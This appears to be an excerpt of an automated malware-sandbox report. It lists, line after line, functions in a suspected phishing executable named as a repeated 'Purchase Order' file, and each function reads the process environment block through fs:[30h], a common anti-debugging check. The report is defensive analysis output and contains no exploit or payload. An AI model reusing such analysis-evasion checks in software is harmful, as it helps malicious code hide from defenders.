      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E443 mov eax, dword ptr fs:[00000030h]5_2_3484E443
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB450 mov eax, dword ptr fs:[00000030h]5_2_348BB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB450 mov eax, dword ptr fs:[00000030h]5_2_348BB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB450 mov eax, dword ptr fs:[00000030h]5_2_348BB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB450 mov eax, dword ptr fs:[00000030h]5_2_348BB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480645D mov eax, dword ptr fs:[00000030h]5_2_3480645D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF453 mov eax, dword ptr fs:[00000030h]5_2_348CF453
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34811460 mov eax, dword ptr fs:[00000030h]5_2_34811460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34811460 mov eax, dword ptr fs:[00000030h]5_2_34811460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34811460 mov eax, dword ptr fs:[00000030h]5_2_34811460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34811460 mov eax, dword ptr fs:[00000030h]5_2_34811460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34811460 mov eax, dword ptr fs:[00000030h]5_2_34811460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F460 mov eax, dword ptr fs:[00000030h]5_2_3482F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F460 mov eax, dword ptr fs:[00000030h]5_2_3482F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F460 mov eax, dword ptr fs:[00000030h]5_2_3482F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F460 mov eax, dword ptr fs:[00000030h]5_2_3482F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F460 mov eax, dword ptr fs:[00000030h]5_2_3482F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482F460 mov eax, dword ptr fs:[00000030h]5_2_3482F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489C460 mov ecx, dword ptr fs:[00000030h]5_2_3489C460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E547F mov eax, dword ptr fs:[00000030h]5_2_348E547F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812582 mov eax, dword ptr fs:[00000030h]5_2_34812582
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812582 mov ecx, dword ptr fs:[00000030h]5_2_34812582
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34844588 mov eax, dword ptr fs:[00000030h]5_2_34844588
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E59C mov eax, dword ptr fs:[00000030h]5_2_3484E59C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489B594 mov eax, dword ptr fs:[00000030h]5_2_3489B594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489B594 mov eax, dword ptr fs:[00000030h]5_2_3489B594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF5BE mov eax, dword ptr fs:[00000030h]5_2_348CF5BE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348345B1 mov eax, dword ptr fs:[00000030h]5_2_348345B1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348345B1 mov eax, dword ptr fs:[00000030h]5_2_348345B1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD5B0 mov eax, dword ptr fs:[00000030h]5_2_348AD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD5B0 mov eax, dword ptr fs:[00000030h]5_2_348AD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348455C0 mov eax, dword ptr fs:[00000030h]5_2_348455C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E55C9 mov eax, dword ptr fs:[00000030h]5_2_348E55C9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348165D0 mov eax, dword ptr fs:[00000030h]5_2_348165D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A5D0 mov eax, dword ptr fs:[00000030h]5_2_3484A5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A5D0 mov eax, dword ptr fs:[00000030h]5_2_3484A5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E5D1 mov eax, dword ptr fs:[00000030h]5_2_3484E5D1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E5D1 mov eax, dword ptr fs:[00000030h]5_2_3484E5D1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D5D0 mov eax, dword ptr fs:[00000030h]5_2_3488D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D5D0 mov ecx, dword ptr fs:[00000030h]5_2_3488D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348395DA mov eax, dword ptr fs:[00000030h]5_2_348395DA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C5ED mov eax, dword ptr fs:[00000030h]5_2_3484C5ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C5ED mov eax, dword ptr fs:[00000030h]5_2_3484C5ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34847505 mov eax, dword ptr fs:[00000030h]5_2_34847505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34847505 mov ecx, dword ptr fs:[00000030h]5_2_34847505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A6500 mov eax, dword ptr fs:[00000030h]5_2_348A6500
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CB52F mov eax, dword ptr fs:[00000030h]5_2_348CB52F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D530 mov eax, dword ptr fs:[00000030h]5_2_3484D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D530 mov eax, dword ptr fs:[00000030h]5_2_3484D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5537 mov eax, dword ptr fs:[00000030h]5_2_348E5537
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484B570 mov eax, dword ptr fs:[00000030h]5_2_3484B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484B570 mov eax, dword ptr fs:[00000030h]5_2_3484B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34814690 mov eax, dword ptr fs:[00000030h]5_2_34814690
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34814690 mov eax, dword ptr fs:[00000030h]5_2_34814690
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D6AA mov eax, dword ptr fs:[00000030h]5_2_3480D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D6AA mov eax, dword ptr fs:[00000030h]5_2_3480D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348466B0 mov eax, dword ptr fs:[00000030h]5_2_348466B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A6C7 mov ebx, dword ptr fs:[00000030h]5_2_3484A6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A6C7 mov eax, dword ptr fs:[00000030h]5_2_3484A6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348416CF mov eax, dword ptr fs:[00000030h]5_2_348416CF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF6C7 mov eax, dword ptr fs:[00000030h]5_2_348CF6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D6E0 mov eax, dword ptr fs:[00000030h]5_2_3483D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D6E0 mov eax, dword ptr fs:[00000030h]5_2_3483D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348436EF mov eax, dword ptr fs:[00000030h]5_2_348436EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348906F1 mov eax, dword ptr fs:[00000030h]5_2_348906F1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348906F1 mov eax, dword ptr fs:[00000030h]5_2_348906F1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CD6F0 mov eax, dword ptr fs:[00000030h]5_2_348CD6F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E609 mov eax, dword ptr fs:[00000030h]5_2_3488E609
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34841607 mov eax, dword ptr fs:[00000030h]5_2_34841607
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484F603 mov eax, dword ptr fs:[00000030h]5_2_3484F603
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34813616 mov eax, dword ptr fs:[00000030h]5_2_34813616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34813616 mov eax, dword ptr fs:[00000030h]5_2_34813616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852619 mov eax, dword ptr fs:[00000030h]5_2_34852619
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34846620 mov eax, dword ptr fs:[00000030h]5_2_34846620
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34848620 mov eax, dword ptr fs:[00000030h]5_2_34848620
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E627 mov eax, dword ptr fs:[00000030h]5_2_3482E627
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481262C mov eax, dword ptr fs:[00000030h]5_2_3481262C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5636 mov eax, dword ptr fs:[00000030h]5_2_348E5636
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482C640 mov eax, dword ptr fs:[00000030h]5_2_3482C640
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A660 mov eax, dword ptr fs:[00000030h]5_2_3484A660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A660 mov eax, dword ptr fs:[00000030h]5_2_3484A660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34849660 mov eax, dword ptr fs:[00000030h]5_2_34849660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34849660 mov eax, dword ptr fs:[00000030h]5_2_34849660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD660 mov eax, dword ptr fs:[00000030h]5_2_348AD660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34842674 mov eax, dword ptr fs:[00000030h]5_2_34842674
